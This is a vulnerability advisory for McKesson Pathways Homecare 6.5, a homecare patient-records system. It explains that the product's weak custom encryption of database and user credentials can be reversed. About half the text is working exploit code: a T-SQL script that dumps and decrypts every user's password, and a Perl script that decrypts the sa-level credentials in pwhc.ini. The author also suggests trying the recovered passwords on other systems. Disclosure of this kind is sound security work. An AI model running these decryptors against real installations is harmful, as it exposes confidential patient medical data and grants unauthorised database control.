|
|
|
|
| |
| Pathways Homecare may give attackers access to certain configuration files, and enables them to achieve 'sa' or equivalent account privileges for SQL Server 7.0 (MSDE). In addition, it is possible to retrieve application passwords for all users of the application. |
| |
Credit:
The information has been provided by shoeboy.
|
| |
Vulnerable systems:
Pathways Homecare version 6.5
According to the vendor, McKesson's Pathways Homecare is the first comprehensive client/server application introduced to the homecare market for advanced information management.
This is a product that stores patient information, billing information, and medical records for people who receive health care in their homes. Each clinician has a laptop and all the laptops are periodically synchronized with a central database. Additionally there is a desktop client for administrative staff. Both the laptops and the central database server run Microsoft SQL Server 7.0.
Workstation and laptop users alike get their connection information from a file named pwhc.ini that contains an encrypted username and password. For workstations, the file is stored on a central fileserver and the account is likely to have DBO level permissions on the central database. For the laptops, this file is stored locally and the account used is either 'sa' on the local version of SQL or has equivalent permissions.
As you have probably guessed by now, the vendor has decided to use their own encryption algorithm:
1) They determine whether the username/password is even or odd in length.
2) If odd, they use the following sequence of numbers: 3,8,5,10,7...
3) If even, the sequence is 7,4,9,6,11...
4) Then they reverse the username/password and subtract the corresponding number in the sequence from each byte.
Obviously, this encryption algorithm can be easily reversed.
This grants anyone who can get access to the config files for Pathways Homecare to read and modify confidential patient information as well as enjoy sa privileges on laptop clients. The next stage is to obtain access to the data.
Unfortunately the vendor uses the exact same encryption method with slightly different key sequences for this additional layer of security. It's possible to retrieve the username and password for every user in about 2 seconds. The T-SQL code to do this follows:
SET NOCOUNT ON
DECLARE @evenkey varchar(15)
DECLARE @oddkey varchar(15)
DECLARE @key varchar(15)
DECLARE @cryptstr varchar(15)
DECLARE @position tinyint
DECLARE @length tinyint
DECLARE @usrid varchar(30)
DECLARE pwd_cursor CURSOR FOR SELECT usrID, pwd FROM usr
OPEN pwd_cursor
FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr
SET @evenkey = 'FDHFJHLJNLPNRP'
SET @oddkey = 'CGEIGKIMKOMQOSQ'
WHILE (@@FETCH_STATUS = 0)
BEGIN
SET @position = 1
SET @length = datalength(@cryptstr)
IF ((@length % 2) = 1) SET @key = @oddkey
ELSE SET @key = @evenkey
WHILE (@position <= @length)
BEGIN
SET @cryptstr = STUFF(@cryptstr, (@length - @position) + 1, 1,
CHAR((ASCII(SUBSTRING(@key, @position, 1)) - 65)
+ ASCII(SUBSTRING(@cryptstr, (@length - @position) + 1, 1))))
SET @position = @position + 1
END
PRINT @usrID + ' : ' + @cryptstr
FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr
END
DEALLOCATE pwd_cursor
GO
Bang! Out come the passwords and it is time to see if the user uses the same password elsewhere.
Vendor status:
The vendor was contacted (security-alert@mckesson.com) 2 weeks ago. An immediate response was received telling that the message had been forwarded to the appropriate parties within the Pathways Homecare product group. No further response was received.
Exploit:
#! /usr/bin/perl -w
####################################################################
# pwhc_crack.pl -- Extracts a password from a Pathways Homecare PWHC.ini
file
####################################################################
use strict;
open (PWHC, "pwhc.ini") or die "Unable to open .ini file";
while (<PWHC>) {
chomp;
if ($_ =~ /^UserID/) { print "UserID: ", decrypt($_), "\n"; }
if ($_ =~ /^Password/) { print "Password: ", decrypt($_), "\n"; }
}
####################################################################
# The sad thing is that this isn't the worst part of product. It's not
# that the vendor is using weak encryption, it's that the quality of
# the encryption is better than most of their code.
####################################################################
sub decrypt {
my $counter = 0;
my $key;
my @cryptstr = split /=/, $_, 2;
my @revstr = unpack("c*", (scalar reverse $cryptstr[1]));
if(@revstr % 2) {
$key = 3;
while ($counter < @revstr) {
$revstr[$counter] += $key;
$counter++;
$key += ($counter % 2) ? 5 : -3;
}
}
else {
$key = 7;
while ($counter < @revstr) {
$revstr[$counter] += $key;
$counter++;
$key += ($counter % 2) ? -3 : 5;
}
}
return pack("c*", (reverse @revstr));
}
__END__
|
|
|
|
|
